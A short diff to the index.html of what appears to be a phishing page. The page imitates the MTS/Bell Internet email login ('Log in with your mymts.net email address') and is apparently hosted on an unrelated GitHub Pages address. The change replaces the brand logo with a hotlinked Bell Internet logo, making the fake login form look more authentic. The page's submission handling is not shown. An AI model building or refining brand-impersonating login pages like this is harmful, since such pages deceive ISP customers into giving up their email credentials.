--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
         <form id="form" name="sentMessage" novalidate="novalidate">
             <input name="__original_url" type="hidden" value="https://sourcesecureauth.github.io/newlogin/"/>
             <div class="logo">
-                <img src="https://cableco.auth-gateway.net/images/mts/bellmts.png" alt="MTS Logo" />
+                <img src="https://download.logo.wine/logo/Bell_Internet/Bell_Internet-Logo.wine.png" />
                 <p>Log in with your mymts.net email address</p>
             </div>
             <div class="container">
